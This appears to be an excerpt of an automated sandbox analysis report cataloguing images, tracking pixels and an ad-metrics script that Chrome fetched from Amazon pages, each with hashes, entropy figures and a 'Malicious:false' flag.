                                                                                                                                                                                                                                                                      Entropy (8bit):7.875674719603265
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:4nld8BxE38orvWzvy8GzMZ0XzKoUgpeObmSzraJypu:4zDnrvAvy8GzI0XD/plzWJ6u
                                                                                                                                                                                                                                                                      MD5:8ABD97978296C8EEE78E3744E858E309
                                                                                                                                                                                                                                                                      SHA1:E9F3986067AFD3149BA8ADF97DFFA6E3F739943E
                                                                                                                                                                                                                                                                      SHA-256:40851D0EB9E79CC5F717AFD85A828D581AA039E6D4D537A1F0E65AD3EE39932A
                                                                                                                                                                                                                                                                      SHA-512:189FEA09812555CD30855F3A76B8FA5A8D9DDA085D9ACF56867F90038304EEE5163CD82345EA32D6EA6CA381A7B3F85BA0ACF8C15975A3EF318E63F3525AD421
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/51dtNa41nuL._SX1500_.jpg
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (30900)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):30946
                                                                                                                                                                                                                                                                      Entropy (8bit):5.2642111425198035
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:HXhQ+LMasRxYQxky/diedmkDsdJS4Ok0o0MRbjigQeUpteUHiyYNDbDUkBGP95xP:RQms7Hx9F4Ok2rKGPZ
                                                                                                                                                                                                                                                                      MD5:976E8467CE0507E7C353E8CDF51A47AE
                                                                                                                                                                                                                                                                      SHA1:0F3586B696BD6D72B4F479F0006E6646FF8FA065
                                                                                                                                                                                                                                                                      SHA-256:F568DF0B01BA2FD16758F3E126AF7F88E041DA72D13197BCCF925224BF09A98A
                                                                                                                                                                                                                                                                      SHA-512:C7D61A9E9ACB19C220AD429CABEAE9F7570F160BB4D4270E177A996961070417376535BEB75F05A49CE64C225B9A539AD25A526BF4CBA70836052CE994DFB1E7
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature","cf",e),a("criticalFeature","cf",t),a("loaded","ld")),o=a("loaded","ld",e),l=(a("loaded","ld",t),a("viewablelatency:bodyBegin","bb",i),a("viewablelatency:loaded","ld",i),(e,t)=>{console.error(e,t)}),d=e=>{e.sendLatencyMetric(n),e.sendLatencyMetric(r)},c=e=>"V"===e,h={1027:"Sponsored Display DRA"},m={1:"Enabled",0:"NotEnabled","-1":"Unknown"},u=e=>v(e),v=e=>decodeURIComponent(escape(atob(e))),p=e=>e&&0===Object.keys(e).length&&e.constructor===Object;let g=null,w=null,b=null,f=null,y=null;const M=new class{viewabilityStandards(){return f=f||[],f}payload(){return b=b||{},b}},x={ext:{inViewPercentage:()=>(g=g||0,Math.round(100*g)),geom:()=>(w=w||{},w)}},C={playingTime:()=>(y=y||0,y)},E=()=>M,P=()=>C,T=e=>{var t,i,a,s;g=void 0!==(null==e|
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://aax-eu.amazon-adsystem.com/e/loi/imp?b=JA6_dv6h66iD3gIHv_uvJpoAAAGRdjLkNwMAAAH2AQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICA1J2Nd
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26ctb%3D1%26sc0%3DjQueryPageShow%26cf0%3D51719%26pc0%3D51719%26ld0%3D51719%26t0%3D1724264970913%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26lob%3D1:51718
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x280, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10706
                                                                                                                                                                                                                                                                      Entropy (8bit):7.915794968661681
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1OL4yju9DzsbhraScn8MlFuvYH28jVEeb4GP3mNi83lmyLOwkNrMAgGf:1OLNjututaSc8MlbjVEeb4smt4/rMAgu
                                                                                                                                                                                                                                                                      MD5:6837BA0E008DA04BB2463DCC4C3C4E96
                                                                                                                                                                                                                                                                      SHA1:1DE210818EE3130FDD4471CDA41FD682743EFB41
                                                                                                                                                                                                                                                                      SHA-256:C1D9E1926CC1A94A578B8F150B452C144DB52584868595F651CF2F9969121FAD
                                                                                                                                                                                                                                                                      SHA-512:EDECCBB53F8A0F44A8E3997F3907F67C19CE7602412F3DBCA584107659BCB413624F688E65DAC840975ADDB1D76E573F6CDE712F3D6A86E2F9E6FA9E8C95F7FB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................@................:H..Y......n........BbX@..,.K.....`.u.....>....................;....6W......eg..........1.Hx........... .............{h..ZP&[j.......^..yfP7.M.zy.-.g:=|..kx~........+....6..3..1....B!W&....[.P...L`.../?j......nJ.}$.-....(....D.@.....'T.......t.._..k.R.a...L/...<~.....OM..Tu.T.&.Kso....D....T.........................i......-.@.D(......WA../..........^....g.4..DIf[..^.....<Ah.pzNQxm........?..g.U."....q..t6.6W.....t/....m.=bo..6..p T`.}?.......n.5o.U...n..../..=.....=Q..V..P..lq].@X.mG..h...n.[..>...A....wOh.....-....]D.....".BK.......-.'.tD..~.............O.....S...K8A.Pm:w......5.^..~.t.\....?.........W.1.].0.s.-+..D:6ML.[..XtP...'...?A..=k.4..h0yg.%{...'..%.I...q.0>..<S{7.A.@...s...........>.......w}..@......zX`..........L.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1], baseline, precision 8, 640x360, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):22318
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9230921808803645
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:PghA9fFW+ZlrJal/O1eqXKoXBM/VV5gquq1dXUw3O6s3GaD2t9DC0xEbq1Ys48:PghADlzkEggKoXC/VV5gJYl3O6WGZz9x
                                                                                                                                                                                                                                                                      MD5:AE6A0C06C734F17EBC6C6152D334791D
                                                                                                                                                                                                                                                                      SHA1:D26F9C617E9C4F31975250D2D201251C3BE490F1
                                                                                                                                                                                                                                                                      SHA-256:A746ADFCA52A4D02056281EECCF7BAD9198866265255DC365E2BE01A4FF65C43
                                                                                                                                                                                                                                                                      SHA-512:AB40ECC3E1E25C3B180D54EEB43B64944E9F93286839C09D764CED81CC113A779F26F215EA789C6EE753C2A2B11A3E00CC7753C5EB0F441D23ED4324C694363B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.............JExif..II*.......i.........................,...............Version 1.0.0..........................................%...#... ,!#&')*)..-1-(0%))(...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......h...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......Zp...--%:..KIKH.....P..(..R.R...IK@................-%.......R.J(...P..8J..h.).V....i.n..N.....&...........f.J.]......|...wu$..r. ...]...\.$..G..X`..q.{5y2..Vv.=v;.yT2..}.......o.Ah..6;.8...W!......uC...$....zb..._..D...K..G..$S..$...Y:..X{s8.-.!.L..q.II_bV.I.?..WN.l.#...6O...T...oc.kB=J
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 136 x 104, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):5861
                                                                                                                                                                                                                                                                      Entropy (8bit):7.941819196061047
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:s5LS1YmLYIid4UFrn782yy57rQflsr4971/SauFVE26HrKYz0L/aw8oBXMZc1gXx:UEYYYIidFR78MnQ9C4971Sx/6HGYz+/6
                                                                                                                                                                                                                                                                      MD5:661F95800A801676A279D066C3C8114E
                                                                                                                                                                                                                                                                      SHA1:C495A9B59AFD9B35A08C12513D40B8C7E7771499
                                                                                                                                                                                                                                                                      SHA-256:849C8F9A22736A09D7C0C7981842D932777B5A0056CBA7DF41997C49D536225D
                                                                                                                                                                                                                                                                      SHA-512:A42EC4D0051537ED8B7BD27150E4FEA8F688C3B5FF6FAB2EF03B64492DE8033517AE019F72855102BE5F4405E537A5600F987331B2B2D30F81F37FEB251FFB03
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......h.....*.......gAMA......a....:iCCPPhotoshop ICC profile..H...wTT....wz..0.)C.. .7..Da..`(..34.!...ED..A."..."."...`... ..`.QQy3.Vt.....g}k...=g.}.......tX..4.....J....c........`.23.B=.H>.n.L..."..7w.+.7....t..I...........d..P....}F....1.(1.E..........";....c.X|..v.[.=".%....qQ...-.[".L..qE.V...af.."....+I."&..B.D....).+........Rn...|nb........2...T.@`..d.0.l.[zZ......?KF\[....f...F..f_..n.M.{.H..?....}..._z=..YQmv|.....c3.....4.. ).[..W....%I .31...6.rX.......7.......(..........S.|zf.....y..q._..0....sx..p.qy..v..\.7.G...S..a..8."Q.>.j.1......>.....s@....7.|8.......,...e.%...9.-$............H.*P.*@...#`.l.=p......0..V..H.i...A>...@...v.jP..@.h.'@.8.....:..n..`....`......a!2D.. UH.2..!...y@.P....A....B..&..*...:....:.]..B..=h...~....L...2............p"......p.\.......u.6<.?.g........!....D......C..J..iA..^.&2.L#.P...EG...Q..(.j5j...U.:.jG..n.FQ3.Oh2Z.m..C..#..lt....nC_B.F...`0..F.c...Da.1k0....V.y. f.3..b...X.l ...`..{...C.q.[..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5855
                                                                                                                                                                                                                                                                      Entropy (8bit):7.907574754500911
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:geUeESIGg1JDz9Lu02E/VSgBsR8iQANcTMfHePFHnP2IKgEIglOVwV:gRegHDx627sR8iQANceHePkmO
                                                                                                                                                                                                                                                                      MD5:E53DEE0B92BD58107A75AE6D08A54DB5
                                                                                                                                                                                                                                                                      SHA1:869C688B939AF4641368E47E69636021059C6087
                                                                                                                                                                                                                                                                      SHA-256:88D213253D47A3B8FED89F737EE8F61F2B9E6EDF44A4344D76806E6B31B31E41
                                                                                                                                                                                                                                                                      SHA-512:E975D1F18CDA5DC61F4AEBE83C0B072510890E59206C3340D45A5F2F3B46EE6CD88183313BFBA6AC58A06A2EFC6ECB997592CAD87ACFBE38D1E54D0D01E26A4B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871141_186x116_1X_en_AE._SY116_CB569183660_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t....".................................................................".2BR..#3b..Sr...!$1Ct....%AEcs...&45DQdq...........................................................!"12..AQaqR......Bbr......%.#$4...............?.e...u`QE.....2..!..c..FL.|C.5.t\>>&}...UF....F./G.\K....P.;,.....\..|]#.V9v...')).)..Hr.J....k.]jo...&'..h.........jQ.kTW..RX.&...fB$x...r.k.Ql..."..n.C...8....H.._..R4.N).]J...'...S.]."j!.-.q.........B...g...#yKk"".p......M.p.....y.q6...z...........Dd....a\..q.{_..Yc.i.O8..Q!5Ev..?S..D..%....&.{.Zy'. ........t|.Z...i.wS'...N.i.I...fq.......b-...i.S....d.'.m...q`....}).l.4...0.AV.O].{}.=...."[..(....^....6.?..._...._.?./.....wm.i#...*...p.'..<s..q.cM"OK^.........>.."..6.|Fb.S... 2..M.$./W..6'.....J.6.~...1.>hm.L....4V...._......'.z..%...b..M..#.}D>,=T....W.....*.....*\.<x...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):1921
                                                                                                                                                                                                                                                                      Entropy (8bit):7.700924191769921
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0rZ5iEFkoP3/k2bLC2NUck3Usos/32rQbbbbbD:TMGoP5bLZNUb3/os/G0bbbbbD
                                                                                                                                                                                                                                                                      MD5:14A9590A6F74261E30CF769FA24A369C
                                                                                                                                                                                                                                                                      SHA1:8272795EDCD4D83539BCBC6E19F6DF442D2567F5
                                                                                                                                                                                                                                                                      SHA-256:C4604DFBCBA33A0A037C81EED49EBAD061A7D104D8897E7EF9F881517A04CF27
                                                                                                                                                                                                                                                                      SHA-512:750BDA44D6BB6482BBE102640D1834161BE40E690804BBE60A3856AFC40B307FB56E4CB1D1AB34D8EFFC9AA2301A3873CDBCBCB97B0220267DD01CB2BB16EDDC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_True_1x._SY116_CB659040113_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........x.....................................................!1.AQ."..2aqR.b....$r........................................................?...................]S.dl&V...e.=..\..................+=..K..jn5......q....;...=a.\.|.2...!..lc..|..mh>......!.....fw.3.}.....%.f.I;g|...~..<..7..r.D..b..f7.z.......ml^.7_..`.JZh.q.NyQ....T._X.RY^...n...N....;..X&.M..O.%4.1|.Xi,..`9....K^.=.....395l..v+b.........D@DD.]$..frP?.ub.Y...1....y....8.....ER..).L]..U............0.....U..,......l.........A.4.z=Y../!..'3.............X.]4.l.y1.,...e..3WZ.y..V8 s..Pf..Kr.o...4.g5..i.Q.=r..V[.~..9.2...{...`.M.../*y..*/...k...<m.=(..w..h..'....@DD......**$lQF3t.:Z..)...K-....S..$o.M......_.(f.Z.N..Q1.~.1.y...4.t...F.....f...j...TW..n..{Oc.].*....)..u>.~....wV"Tt.4..1Fu._O.=X%..h..|g...k_r.T.ki.....UHu4...9...........
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):13218
                                                                                                                                                                                                                                                                      Entropy (8bit):7.864034228159954
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:E++Fig5KfN74L1XzqzZgJXZiWGqG2KxKne1YxBU7YlpWnFGes8T8squWESbljEi2:7+04xXVX8YrBUMbUFGes8osquaowQ5EY
                                                                                                                                                                                                                                                                      MD5:EFFFF114D0586635AFBBA9DF43E7CB5B
                                                                                                                                                                                                                                                                      SHA1:77B21281CCA6A50FB939E2D58D82A626A88E4CBA
                                                                                                                                                                                                                                                                      SHA-256:CA262FCFBCE803D40BBA897B0DB44BA02454A6ADE29CB98279BDC5D1EF77558F
                                                                                                                                                                                                                                                                      SHA-512:D3B4EE80987D0B8311652F7C9E3068157E351EFAC356FF3B2B0485C905296E07AE04D8327468CF95885D2278BCA9EBE6161D0E6A9C2B3DB0BAD29EA9B2269C8A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR..............$....8PLTEGpL.y!.y!.y!.z".y!..%.:.o<..z".{#....^.J....z .......y!....z!.y!.....z"......ossnrrQegJNNAKLIMM[^_JNNIMM....tP.........OSS..........GLMJNNBFFJNNJNNINN...JOP...JNN...~.....JNNIMM...IMM...................x..~.pss.q...........y!.{".z!...z".........z"..&......G..C...y!.y"..8.z!.y..:..9..9..._.L6.....}b.......htRNS.?.. .....o..........`...Q....>. ..............Kt............^..................w...H.f.................s....1.IDATx...E..0.CQS.a...s.Q.....hW...i.....B....5....;`...6......w.{.....:......x......5.x...J.R.f!..)...i.<.\$-..M.)...i.<T".8....5.x.4.NDB..u..#...6.B+V;+%.._......D.Ke....o.{E.1.<.M.G......4.......u..p...4'..p.....416$8q...)...B...B..C .R.K.~...G.=H..._.3......AS..o..8Bi....KW.s...Ei).~f...I..I.g......w.z.......i.k..,......h,......>.2.~....}iT..}*)..-......Os..S&..P{i..(8.Z....$.8....YJ...+.K/5......."...}:P...P{....g...4#.|.3v`..SHruI.PA..C~~.6..).Z].S*(..pDw.....q........D..ZY...,....\..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 169x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):10632
                                                                                                                                                                                                                                                                      Entropy (8bit):7.961860501474742
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:x3A9++vQQlh/cLkCyqNORb9ez62dK6iNYq7RZ6yPl3+bxPJz6xB/mYG+/S2FQ1FV:KvQQLp1Ez7U60nb6il3sPoxB/zS2EJj
                                                                                                                                                                                                                                                                      MD5:F9996ABFCFEAE3EB5326DEA1731C3EF1
                                                                                                                                                                                                                                                                      SHA1:8EBF32DE68A5AA28CB7E210E76AB31B6B5C23C59
                                                                                                                                                                                                                                                                      SHA-256:80668D4A9771C5044686D2F810599A9FF0384E6C829B9BAF42A3529B406F8AA3
                                                                                                                                                                                                                                                                      SHA-512:46287019A8C3AF778EE4ABF71128189CA0D84A0DD03B2E41FC1B8852437A89F7FB2B0A44A4495673A3CA0AA66A341440BB1D8DA7BE1AC9499F57521206770F6C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71x9vjwX9IL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1.."2AQa.q...#Rrs....3BCDdt....4...&5Sb.......%T................................................!1.Aq..3Q..#Ra"......$2Bb..............?..*P.w..1...iM.0.mk..H.#n.7....r......?...4..][>.s.$2...=...@.....R.Z3.6|.b.3Q...`.twX..{.i..........I.iP..XG....x..zn....x....=3..Y..M.J.".R..}.^K.D.P0t......U.o..R............W.......U........u..3..7u........qM.J.{dV..3...WT `.*..1..........^.(}....V..n....S...q.M......T.]..QA.......i.Rv...SmF8.{..i...;4.,qG..^G`...T.c.P...>..pB.K.bu|M.....vWk.#.>2..........).q.6Vq$.I<!.%V.....*...[.q.*/U..r>m..(...(.......`...}.u...}.Z..}-...T.7..$._.i6s.....Q.}......,.~oAX.7..J?R7....2hm..\T]?Fh..l.3o.....$..d....J3a..Z..+...n.{~.a[....v.#.........."}.+FO.:m.[.U..........Bh..D....x....Of......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):42482
                                                                                                                                                                                                                                                                      Entropy (8bit):7.980199111880759
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1+Rp5bUEDD+04AhUy5j7cKjZw3g2OV3VnqJhYyHx8/Xeg9hb9ZBwVrGReeSoNf3u:AJIEP6i/jFsgXioXLb9XwVrWZ3/Ns
                                                                                                                                                                                                                                                                      MD5:A6685C2BE6804CE57563EFCD2CE2E2CA
                                                                                                                                                                                                                                                                      SHA1:C4EA06CCE4EEB31A97CAF6893B64F9AF68BE07B8
                                                                                                                                                                                                                                                                      SHA-256:F9E43A4FD24E0468E3269353A461BB1C05F797BE9590E283470DED40D4DEFBDE
                                                                                                                                                                                                                                                                      SHA-512:CE0D0CF2A5DACD73EF6B740FAAD1B15573ED2FA851B45851AB75641D11DEE95CA8E885539C46DE6B22DA87D2223406BF47134F76A69D5AA784004621B65EAB5F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Outdoors-Hammock-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."..................................................wY...6t...C.|.S^..S...38V...-./m...kb....w:...5z..2CE'....Z..9...s...)...b<.e.VUy..wG.;F..2.,.g.b.i.4.x4......u..F'...2.V...m.VTT.a..I.pQDU.vz.......C&.......l...7..WM> ....u.`{]S..M}....AW_Fmk....0..e..lF..o..Y..cEk....b.i..s....kq$...dm.......{,.Q....<..$z] ...A..pL......]m......$..'.}mCA.yJo..A...Z.]...|......l;<..B.p..,........\...+.C.`.)...^L....S@...o....>J.g3..|._V vV.5y0f...d.+UC.4{ "..R..M'."....5=w.K....-..!.+9..........g.g2.....(..h...^..6...........o.....<..2..ew..D...>%.0-...m^.=u........|.Y..L...H....)7..].k..9..j......P..h.....9skq...Xj..p......c...;.T.i...!Y...%....|vv*...2......Z.h.c..z.U..Xy.j1...kO...o<.b.(..6..K4.x..x..s...j.7.|......y........ .....[.:..=.u...YU.1....u.J.E......i>.....y....fR.q....cO...s.....n2.;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):6870
                                                                                                                                                                                                                                                                      Entropy (8bit):7.638182707225435
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1b2WitYqTzeyyyyyyyyyyyyyyyyyyyyymKlEeUsj5M+S4d:1smyyyyyyyyyyyyyyyyyyyyy9Yw5I4d
                                                                                                                                                                                                                                                                      MD5:A50B8338BD9A8470088B744C9D3F1C8C
                                                                                                                                                                                                                                                                      SHA1:EADAC28E52F05FCF25998CB6452A9ECB4ACDE507
                                                                                                                                                                                                                                                                      SHA-256:9E0FD225453B5769D5C9338CE848C0727D915D2D55CD20FE1D1A065FFAF7F136
                                                                                                                                                                                                                                                                      SHA-512:317AD3C1F667BA030D7FEF9B4815A3F77C75319CBE41D779F7EDDF815E2DC8E33D4D6B4216E78E8D174801C9029F25EB1A70828035F3355A96016CB7C7C632EA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."................................................<.......................f.........................6/.........3MhP.w".&..~............l^........$.^...d.vd.5.}a........6[.....~Ge......'.j.g/C'..Ab........3b...............p}....\No@r.]..!`.6*....5....?...e)+'.Xp..._M..C..........l^...........Ig.7..u.G.:2...,..F^.dn.Ff.^^......Z.s...,Yz;.r..1...........x........mX.......4.....Ue......k{.O....V...j..K~....-....f..F{.....................i....;.\..................................f.........................7.....................................................k .V.P........6.o9..|...b............R.\jM...2........................................................F@...........d.....7Ov'B.c(.{e].5.1..O`....2.......g..V.E..w..y.........2.........^....C...g.[.Z.3......@...............,...........................26..`.5
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
